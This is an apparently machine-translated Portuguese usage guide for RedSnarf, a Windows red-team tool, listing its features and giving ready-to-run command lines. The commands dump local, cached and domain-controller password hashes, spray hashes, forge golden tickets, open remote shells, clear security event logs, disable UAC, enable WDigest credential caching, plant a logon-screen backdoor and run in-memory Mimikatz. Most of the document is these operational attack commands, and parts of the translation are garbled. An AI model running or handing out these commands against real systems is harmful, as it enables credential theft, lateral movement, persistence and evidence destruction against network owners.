RedSnarf é uma ferramenta de teste de caneta / red-teaming por Ed Williams para recuperar hashes e credenciais de estações de trabalho, servidores e controladores de domínio do Windows usando o OpSec Safe Techniques.
A funcionalidade RedSnarf inclui:
A funcionalidade RedSnarf inclui:
- Recuperação de hashes SAM locais
- Enumeração de usuários / s executando com privilégios de sistema elevados e sua correspondente senha de segredos de lsa;
- Recuperação de credenciais em cache do MS;
- Pass-the-hash;
- Identifique rapidamente combinações de nome de usuário / senha fraco e adivinhado (padrão do administrador / Senha 01);
- A capacidade de recuperar hashes em um intervalo;
- Pulverização de Hash -
- Credsfile aceitará uma mistura de pwdump, fgdump e texto simples nome de usuário e senha separados por um espaço;
- Lsass dump para análise offline com Mimikatz;
- Dumping de hashes do controlador de domínio usando NTDSUtil e recuperação de NTDS.dit para análise local;
- Dumping de hashes do controlador de domínio usando o método drsuapi;
- Recuperação de Scripts e Políticas pasta de um controlador de domínio e análise para 'senha' e 'administrador';
- Capacidade de descriptografar cashword hashes;
- Capacidade de iniciar um shell em uma máquina remota;
- A capacidade de limpar os logs de eventos (aplicativo, segurança, configuração ou sistema); (Apenas versão interna)
- Os resultados são salvos por host para análise.
- Ativar / Desativar o RDP em uma máquina remota.
- Altere a porta RDP de 3389 para 443 em uma máquina remota.
- Ativar / Desativar NLA em uma máquina remota.
- Encontre onde os usuários estão logados em máquinas remotas.
- Tela de logon do Backdoor Windows
- Ativar / Desativar UAC em uma máquina remota.
- Stealth mimikatz adicionado.
- Parsing de hashes de domínio
- Capacidade de determinar quais contas estão habilitadas / desabilitadas
- Faça uma captura de tela de um Computador de Usuários Active
- Registro Remote logado Desktop de usuários ativos
- Decrypt Windows CPassword
- Decrypt WinSCP Password
- Obter usuários SPN's
- Recuperar senhas WIFI de máquinas remotas
Requisitos de uso do RedSnarf :
Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git
CredDump7 - https://github.com/Neohapsis/creddump7
Lsass Recuperação usando procdump - https://technet.microsoft. com / en-us / sysinternals / dd996900.aspx
Netaddr (0.7.12) - pip install netaddr
Termcolor (1.1.0) - pip install termcolor
iconv - usado com a análise de informações Mimikatz localmente
Mostrar Ajuda
./redsnarf.py -h
./redsnarf.py --help
Recuperar hachas locais Recuperar hachas
locais de uma única máquina usando credenciais locais fracas e limpar o registro de eventos de segurança
./redsnarf.py -H ip=10.0.0.50 -uC security
Recupere hachuras locais de uma única máquina usando credenciais locais fracas e desmarcando o log de eventos do aplicativo
./redsnarf.py -H ip=10.0.0.50 -uC application
Recuperar hachas locais de uma única máquina usando credenciais de administrador local
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .
Recuperar hachas locais de uma única máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com
Recuperar Hashes em um intervalo de rede usando credenciais de administrador local
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .
Recuperar Hashes em uma faixa de rede usando credenciais de administrador de domínio
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com
Recuperar Hashes em uma faixa de rede usando credenciais de administrador de domínio
./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com
Hash Spraying
Spray Hashes em um intervalo de rede
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .
Recuperar Hashes em um logon de domínio de intervalo de rede
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com
Verifique rapidamente as credenciais
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y
Verifique rapidamente o arquivo contendo nomes de usuário (-hS) e uma senha genérica (-hP)
./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y
Recuperar Hashes de Domínio
Recuperar Hashes usando o método drsuapi (Mais Rápido)
Este método é compatível com um sinalizador opcional de -qy que irá consultar o LDAP e produzir se as contas estão ao vivo ou desativadas
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)
Recuperar Hashes usando NTDSUtil
Este método oferece suporte a uma bandeira opcional de -qy que consultará o LDAP e emitirá se as contas estiverem ao vivo ou desativadas
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)
Golden Ticket Generation
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y
Coleta de informações
Copie a pasta Políticas e Scripts de um Controlador de Domínio e analise a senha e o administrador
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y
Decrypt Cpassword
./redsnarf.py -uG cpassword
Localizar usuário - ao vivo
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name
Localizar usuário - Offline (pesquisa informações pré baixadas)
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name
Listado de Tarefas do Display NT AUTHORITY \ SYSTEM
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y
Screenshot da área de trabalho de um usuário remoto conectado no Active
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y
Misc
Inicie um Shell em uma máquina usando credenciais de administrador local
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y
Inicie um Shell em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y
Recuperar uma cópia do lsass para análise offline com Mimikatz em uma máquina usando credenciais de administrador local
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y
Execute stealth mimikatz, esta opção dispara um servidor da Web para servir um script de powershell , isso é obstruído e codificado lado da máquina, os dados não tocam o disco - os creds são codificados para um estilo fácil de ler e ecoados de volta à tela.
./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y
Executar Comando Personalizado
Exemplo 1
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'
Exemplo 2 - Citações duplas precisam ser escapadas com \
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name "domain admins" | dsget group -members -expand'
Política de Token de Acesso Local
Cria um arquivo de lote lat.bat que você pode copiar e colar na máquina remota para executar o que irá modificar o registro e ativar ou desativar as configurações da Política de Token de Acesso Local.
./redsnarf.py -rL y
Wdigest
Habilite o valor de registro UseLogonCredential Wdigest em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e
Desativar o valor de registro UseLogonCredential Wdigest em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d
Pergunta UseLogonCredential Wdigest valor de registro em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q
UAC
Habilita o valor de registro UAC em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU e
Desabilitar o valor do Registro UAC em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d
Consulta o valor do registro UAC em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q
Backdoor - Backdoor Windows Screen - Pressione Left Shift + Left Alt + Print Screen para ativar
Habilitar o valor de registro Backdoor em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e
Desativar o valor do Registro Backdoor em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d
Valor de registro Backdoor da consulta em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q
AutoLogon
Habilita o valor de registro do Windows AutoLogon em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA e
Desabilitar o valor de registro do AutoLogon do Windows em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA d
Consulta o valor de registro do Windows AutoLogon em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA q
Bloqueie uma sessão de usuário de máquina remota usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uL y
RDP
Ativar RDP em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR e
Desativar o RDP em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d
Verificar o status do RDP em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q
Alterar a porta RDP de 3389 a 443 - Alterar a porta RDP para 443 em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e
Alterar a porta RDP para o padrão de 3389 em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d
Query RDP Port Value em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q
Ativar Multi-RDP com Mimikatz
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uR y
Ativar RDP SingleSessionPerUser em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM e
Desative o RDP SingleSessionPerUser em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM d
Pergunta RDP SingleSessionPerUser status em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM q
NLA
Habilitar NLA em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e
Desativar NLA em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d
Verificar o status NLA em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q